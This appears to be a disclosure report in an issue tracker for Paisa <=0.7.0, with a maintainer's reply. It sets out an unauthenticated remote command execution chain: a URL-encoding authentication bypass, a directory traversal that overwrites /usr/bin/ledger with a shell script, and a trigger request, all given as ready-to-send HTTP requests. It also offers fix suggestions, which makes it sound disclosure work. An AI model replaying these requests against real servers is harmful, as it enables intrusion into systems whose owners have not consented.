paisa <=v0.7.0 web server has an unauthorized remote command execution vulnerability

[pankass]

Describe your Environment
OS: Linux
Paisa Version: 0.7.0
App Variant: Docker

Vulnerability description
There is a vulnerability in Paisa's authentication mechanism. When the administrator sets up an account, an unauthorized attacker can bypass authentication by url encoding the http request URI, and further use /api/sheets/save to overwrite the /usr/bin/ledger file to complete remote command execution.

To Reproduce
Steps to reproduce the behavior:

1. We can use docker to start a paisa server.
2. We can restrict unauthorized user access by setting up accounts, but the core authentication middleware has a vulnerability

Here c.Request.RequestURI is used to determine the route, but c.Request.RequestURI is the original request URI. The route selection of the gin framework is determined based on c.Request.URL.Path, so we can bypass the detection of this middleware by URL encoding, like this

GET /%61pi/config HTTP/1.1
Host: 127.0.0.1:7500
Connection: close

3. After bypassing authentication, you can use the arbitrary file upload vulnerability of /api/editor/validate to overwrite the /usr/bin/ledger file

POST /%61pi/sheets/save HTTP/1.1
Host: 127.0.0.1:7500
Connection: close
Content-Type: application/json
Content-Length: 60

{"name":"../../../usr/bin/ledger","content":"#!/bin/sh\nid"}

4. Finally, use /api/editor/validate to trigger the execution command

POST /%61pi/editor/validate HTTP/1.1
Host: 127.0.0.1:7500
Connection: close
Content-Type: application/json
Content-Length: 2

{}

fix suggestions

1. Authentication middleware uses c.Request.URL.Path to replace c.Request.RequestURI.
2. Fixed a directory traversal vulnerability in SaveSheetFile due to ../../

[ananthakumaran]

@pankass Thank you very much for the detailed report. I have pushed a fix to master and plan to release soon. If you are able to verify the fix let me know. Once again, thank you very much for your time.